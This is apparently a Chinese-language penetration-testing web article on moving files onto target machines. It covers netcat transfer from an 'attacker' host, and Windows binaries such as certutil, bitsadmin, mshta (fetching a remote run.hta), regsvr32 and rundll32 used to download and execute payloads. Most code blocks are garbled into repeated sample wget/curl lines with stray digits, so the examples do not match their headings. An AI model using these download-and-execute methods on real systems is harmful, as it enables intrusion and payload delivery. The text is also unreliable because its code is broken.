1. 简介
2. Linux
2.1 Wget
直接下载:
wget http://www.sample-videos.com/video/mp4/big.mp4
后台下载:
wget -b http://www.sample-videos.com/video/mp4/big.mp4
如果互联网连接出现中断,恢复下载:
wget -c http://www.sample-videos.com/video/mp4/big.mp4
从某个密码保护的 ftp 软件库下载文件:
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
2.2 Curl
直接下载:
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
借助 - o 选项,提供名称,下载文件会以该名称保存;如使用 - O 选项,文件就会以原始名称保存。
2.3 Axel
apt-get install axel
直接下载:
axel http://www.sample-videos.com/video/mp4/big.mp4
2.4 Aria2
这是一种开源命令行下载加速器,支持多个端口,你可以使用最大带宽来下载文件,是一款易于安装、易于使用的工具。
apt-get install aria2
直接下载:
aria2c http://www.sample-videos.com/video/mp4/big.mp4
2.5 Perl
Perl 是一门很吊的语言,使用它基本可以实现任何事情,用它实现文件下载也很简单。
#!perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
执行脚本文件是这样:
wget -b http://www.sample-videos.com/video/mp4/big.mp4
0
2.6 Python
Python 也是很受欢迎的主流脚本语言,代码清晰且简洁:
wget -b http://www.sample-videos.com/video/mp4/big.mp4
1
2.7 Ruby
wget -b http://www.sample-videos.com/video/mp4/big.mp4
2
执行脚本文件是这样;
wget -b http://www.sample-videos.com/video/mp4/big.mp4
3
2.8 PHP
PHP 作为一种服务端脚本,也可以实现下载文件这种功能。
wget -b http://www.sample-videos.com/video/mp4/big.mp4
4
执行脚本文件是这样:
wget -b http://www.sample-videos.com/video/mp4/big.mp4
5
2.9 FTP
wget -b http://www.sample-videos.com/video/mp4/big.mp4
6
当然根据实际情况也可以进入交互终端:
wget -b http://www.sample-videos.com/video/mp4/big.mp4
7
2.10 Netcat
攻击者的电脑上输入:
wget -b http://www.sample-videos.com/video/mp4/big.mp4
8
目标电脑上的命令:
wget -b http://www.sample-videos.com/video/mp4/big.mp4
9
这条命令将连接攻击者的电脑,接受 file 内容保存。
3. Windows
3.1 Powershell
PowerShell 是一种 winodws 原生的脚本语言,对于熟练使用它的人来说,可以实现很多复杂的功能。
下面这两条指令实现了从 Internet 网络下载一个文件。
wget -c http://www.sample-videos.com/video/mp4/big.mp4
0
3.2 IPC$
wget -c http://www.sample-videos.com/video/mp4/big.mp4
1
3.3 Certutil
可以应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2
wget -c http://www.sample-videos.com/video/mp4/big.mp4
2
文件下载并执行如下:
wget -c http://www.sample-videos.com/video/mp4/big.mp4
3
3.4 Visual Basic
wget -c http://www.sample-videos.com/video/mp4/big.mp4
4
wget -c http://www.sample-videos.com/video/mp4/big.mp4
5
3.5 Tftp
在 Windows Vista 以及以后的版本中默认有 FTP,可以使用以下命令运行:
上传:
wget -c http://www.sample-videos.com/video/mp4/big.mp4
6
下载:
wget -c http://www.sample-videos.com/video/mp4/big.mp4
7
3.6 Bitsadmin
Bitsadmin 是 Windows 命令行工具,用户可以使用它来创建下载或上传的任务。只能命令下载到指定路径上,win7 以上:
wget -c http://www.sample-videos.com/video/mp4/big.mp4
8
3.7 msiexec
wget -c http://www.sample-videos.com/video/mp4/big.mp4
9
3.8 IEExec
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
0
3.9 Python
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
1
3.10 Mshta
mshta http://192.168.3.1/run.hta
run.hta 内容如下:
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
2
3.11 Rundll32
依赖于 WScript.shell 这个组件:
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
3
3.12 Regsvr32
Regsvr32 命令用于注册 COM 组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。
WinXP 及以上系统的 regsvr32.exe 在 windowssystem32 文件夹下;2000 系统的 regsvr32.exe 在 winntsystem32 文件夹下。
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
4
test.data 内容:
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
5
还可以利用
https://github.com/CroweCybersecurity/ps1encode 生成 sct 文件:
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
6
3.13 Windows Share
Windows shares 可以加载一个驱动器,然后用命令来复制文件。
加载远程驱动:
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
7
3.14 格式转换
把 exe 转成 hex 文件输入:
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
8
打开 evil.txt 文件,复制内容,然后通过 RDP 的剪贴板复制进目标计算机,把 hex 文件还原成 exe 文件输入:
wget --ftp-user=<user_name> --ftp-password=<Give_password> Download-url-address
9
3.15 其它
1.MSXSL.EXE
msxsl.exe 是微软用于命令行下处理 XSL 的一个程序,所以通过他,我们可以执行 JavaScript 进而执行系统命令。
2.pubprn.vbs
在 Windows 7 以上版本存在一个名为 PubPrn.vbs 的微软已签名 WSH 脚本,其位于
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
0
3.esentutl.exe/extrac32.exe
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
1
4.desktopimgdownldr.exe
desktopimgdownldr.exe 位于 Win10 的 system32 文件夹中,原本用于设置锁定屏幕或桌面背景图像的。
普通用户可以用:
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
2
这样来下载文件。
可以把 C:ProgramData 来改成一个普通用户可写的目录。
下载的文件存放于:
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
3
管理员用户会多写一个注册表项,所以管理员最好的命令是:
curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
4
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...